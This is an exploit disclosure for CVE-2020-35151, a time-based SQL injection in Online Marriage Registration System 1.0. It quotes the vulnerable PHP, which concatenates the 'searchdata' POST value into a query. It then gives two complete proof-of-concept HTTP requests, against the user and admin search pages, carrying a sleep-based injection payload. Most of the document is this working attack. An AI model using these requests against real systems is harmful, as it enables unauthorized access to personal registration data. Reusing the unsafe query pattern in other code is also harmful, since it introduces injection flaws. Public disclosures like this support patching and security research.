# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
# Date: 12-21-2020
# Exploit Authors: Andrea Bruschi, Raffaele Sabato
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# CVE: CVE-2020-35151
I DESCRIPTION
========================================================================
A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account.
Following the vulnerable code:
$sdata=$_POST['searchdata'];
?>
<h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>
<table id="datatable1" class="table display responsive nowrap">
<thead>
<tr>
<th class="wd-15p">S.No</th>
<th class="wd-15p">Reg Number</th>
<th class="wd-20p">Husband Name</th>
<th class="wd-10p">Date of Marriage</th>
<th class="wd-10p">Status</th>
<th class="wd-25p">Action</th>
</tr>
</thead>
<tbody>
<?php
$uid=$_SESSION['omrsuid'];
$sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
$query = $dbh -> prepare($sql);
$query->execute();
$results=$query->fetchAll(PDO::FETCH_OBJ);
II PROOF OF CONCEPT
========================================================================
## Request user
POST /omrs/user/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/user/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="search"
-----------------------------197361427118054779422510078884--
## Request admin
POST /omrs/admin/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/admin/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="search"
-----------------------------267799269040335247322746025522--